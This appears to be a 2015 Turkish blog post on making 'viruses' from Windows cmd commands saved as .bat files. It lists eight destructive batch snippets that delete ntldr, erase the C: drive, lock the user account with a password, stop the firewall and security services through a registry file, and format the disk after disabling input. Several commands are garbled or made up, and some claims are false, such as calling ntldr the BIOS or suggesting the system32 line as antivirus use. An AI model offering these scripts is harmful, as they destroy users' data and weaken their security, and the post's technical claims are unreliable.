21 Eylül 2015 Pazartesi

Cmd komutları ile virüs nasıl yapılır?

Öncelikle CMD'nin ne olduğunu öğrenelim;
CMD'nin açılımını Command'tır, Türkçe karşılığı Komut anlamına gelir. MS-DOS tabanlı Microsoft tarafında yazılmış bir konsoldur. Bu konsola vereceğiniz komutlara bilgisayarınızı yönetebilirsiniz.

CMD Çalıştırma yöntemleri;
Cmd'yi farklı şekillerde çalıştırabilirsiniz,
 1. Yöntem direk olarak cmd konsolundan komut yazmaktır. Bunu için başlat ikonunun sağ tıklayıp "Komut dosyasını çalıştır" tıklayabilir, Veya başlat çalıştır'a "cmd" yazarak konsolu açabilirsiniz.

 2. Yöntem "bat" dosyası yani Windows Toplu İş Dosyası (.bat) oluşturabilirsiniz bunu için öncelikle bir "Yeni metin belgesi" Oluşturunuz daha sonra içerisine çalıştırlması istedeğiniz cmd komut kodunu yazınız ve ".txt" olan metin dosyanızın uzatısını ".bat" olarak yazınız.

Daha farklı şekillerde de cmd komutu çalıştırabilirsiniz ama şimdilik bu konu için bu kadar bilgi yeterlidir.

Şimdi gelelim virüs yapma işlemine;
 1- Bios Silen virüs
Kod:
cd..

cd..

attrib -s -h -r -a c:\ntldr

del c:\ntldr

shutdown -r

Bu virüs bilgisayarınızı parçalarını tanıtan ve başlatmasına yarayan işletimi sistemini siler ve böylelikle bilgisayarınızı kapatıp açtıktan sonra ntldr dosyası eksik hatası verir.

 2- Disk(bellek) Sıfırlayan Virüs
Kod:
/timersecure 0 0 //mkdir şmid(C:,1,2) ş+ şrand(1,99999) ş+ şrand(A,Z) ş+ şrand(a,z)

Bu kod sayesinde HDD'nizdeki tüm veriler silinir ve bilgisayarınız tekrar açmak için format atmanız gerkir.

3- Masaüstünü tamamen silme
Kod:
CD..
CD..
CD.
erase c:/f/s/q/a

Yukardaki kod bilgisayarın masaüstündeki tüm dosya ve klasörleri siler.

4- Bilgisayara Oturum şifresi koyma
Kod:
net user %username% gelbil
shutdown -r

Bu kod bilgisayara oturum şifresi ekler, şifre kodda yazılı olan "gelbil"dir.

5- Güvenlik duvarını kapatma
Kod:
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO A R E S
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0

Yukardaki kod bilgisayarın güvenlik duvarını kapatır. Bu kodu saldırlardan önce kullanırlır.

6- Bilgisayarı kapat komut verme
Kod:
shutdown -i

Yukardaki kod bilgisayarı direkt olarak kapatır. Siz eğer kapatma sebenini göstermek isterseniz "shutdown -c:gelbil" kodunu yazmanız gerekir,Gelbil yazan yere kapatma sebebini yazınız.

Saniye ile kapatmak isterseniz ise "shutdown -t xx" xx yazan yere kaç saniye sonra kapanamasını istiyorsanız yazınız.

Bilgisayarı yeniden başlatmak istiyorsanız şu kodu "shutdown -m" oturumu kapatmak isiyorsanız bu "shutdown -l" yazınız.

7- Windows Sistem32 dosyasını silme
Kod:
C:/windows/system32 /deleted

Yukardaki kod sistem32 dosyasını silerek bilgisayarın çökmesini sağlar. Bu kodu antivirüs olarak da kullanabilirsiniz örneğin silinmeyen bir virüs dosyası yada bozuk bir dosyasıyı da bu kod sayesinde silebilrsiniz yapanız gereken "C:/windows/system32" yazar yere silinmeyen dosaya adresini yazarak silebilirsiniz.

8- Sürekli internet sitesi açma
Kod:
rundll32 mouse,disable
rundll32 keyboard,disable
start gelbil.com
start gelbil.com
start gelbil.com
start gelbil.com
start gelbil.com
CD...
CD..
CD.
erase f/s/q/a
format c:\q\autotest
ipconfig/release
shutdown s\t120


Bu virüs Fareyi ve Klavyeyi çalışmaz hale getirir ve sürekli olarak internet sitesi açar ve daha sonra da c'yi siler.

Kodları çalıştırmak için CMD Çalıştırma yöntemlerini kullanabilirsiniz.
Bu konu sadece bilgilendirme amaçlıdır, Hiçbir kötüye kullanım bizim sorumluğumuzda değildir.

Hiç yorum yok:

Yorum Gönder